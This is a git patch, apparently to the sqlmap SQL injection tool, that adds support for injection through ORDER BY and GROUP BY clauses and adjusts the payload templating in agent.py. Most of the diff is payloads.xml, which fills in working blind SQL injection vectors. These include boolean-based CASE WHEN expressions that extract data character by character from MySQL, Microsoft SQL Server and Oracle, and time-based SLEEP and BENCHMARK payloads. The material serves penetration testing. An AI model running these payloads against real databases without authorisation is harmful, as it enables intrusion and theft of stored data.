From 9d55c4da877d06a25fb659717e6a523c0bbcc7d1 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 3 Dec 2010 16:12:47 +0000
Subject: [PATCH] Done with support for injection in ORDER BY and GROUP BY
 (hopefully)

---
 lib/core/agent.py | 12 ++++++---
 xml/payloads.xml  | 62 +++++++++++++++++++++++------------------------
 2 files changed, 39 insertions(+), 35 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index b5b7a7b93..a4fdd7ff0 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -155,14 +155,14 @@ class Agent:
         # payload, do not put a space after the prefix
         if kb.technique == 4:
             query = kb.injection.prefix
+        elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
+            if kb.technique != 3:
+                query = kb.injection.prefix
         elif kb.technique and kb.technique in kb.injection.data:
             where = kb.injection.data[kb.technique].where
 
             if where == 3:
                 query = kb.injection.prefix
-        elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
-            if kb.technique != 3:
-                query = kb.injection.prefix
 
         if query is None:
             query = "%s " % kb.injection.prefix
@@ -212,6 +212,12 @@ class Agent:
 
             payload = payload.replace("[ORIGVALUE]", origvalue)
 
+        if kb.dbms is not None:
+            # NOTE: ugly hack due to queries.xml's <inference> tag
+            # starting with 'AND ' string
+            inferenceQuery = queries[kb.dbms].inference.query[4:]
+            payload = payload.replace("[INFERENCE]", inferenceQuery)
+
         return payload
 
     def getComment(self, reqObj):
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 46ae93341..1df874b40 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -402,7 +402,6 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
-        <vector></vector>
         <request>
             <payload>AND [RANDNUM]=[RANDNUM]</payload>
         </request>
@@ -418,7 +417,6 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
-        <vector></vector>
         <request>
             <payload>OR [RANDNUM]=[RANDNUM]</payload>
         </request>
@@ -430,6 +428,24 @@ Formats:
 
 
     <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+    <!-- TODO: check against Microsoft Access and SAP MaxDB -->
+    <!-- NOTE: this does not behave as expected against SQLite -->
+    <test>
+        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
+        <request>
+            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
+        </request>
+        <response>
+            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
+        </response>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
         <stype>1</stype>
@@ -437,7 +453,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector></vector>
+        <vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
         </request>
@@ -457,7 +473,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector></vector>
+        <vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
@@ -476,7 +492,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
-        <vector></vector>
+        <vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
@@ -495,7 +511,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
-        <vector></vector>
+        <vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
         </request>
@@ -507,24 +523,6 @@ Formats:
         </details>
     </test>
 
-    <!-- TODO: check against Microsoft Access and SAP MaxDB -->
-    <!-- NOTE: this does not behave as expected against SQLite -->
-    <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector></vector>
-        <request>
-            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
-        </request>
-        <response>
-            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
-        </response>
-    </test>
-
     <test>
         <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
         <stype>1</stype>
@@ -552,7 +550,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
-        <vector></vector>
+        <vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
@@ -571,7 +569,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>3</where>
-        <vector></vector>
+        <vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
@@ -590,7 +588,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>3</where>
-        <vector></vector>
+        <vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
         </request>
@@ -611,7 +609,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
-        <vector></vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
         </request>
@@ -1216,7 +1214,7 @@ Formats:
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
+        <vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
         <request>
             <payload>AND SLEEP([SLEEPTIME])</payload>
         </request>
@@ -1236,7 +1234,7 @@ Formats:
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
+        <vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
         <request>
             <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
         </request>
@@ -1303,7 +1301,7 @@ Formats:
         <risk>3</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
+        <vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
         <request>
             <payload>OR SLEEP([SLEEPTIME])</payload>
         </request>
@@ -1323,7 +1321,7 @@ Formats:
         <risk>3</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
+        <vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
         <request>
             <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
         </request>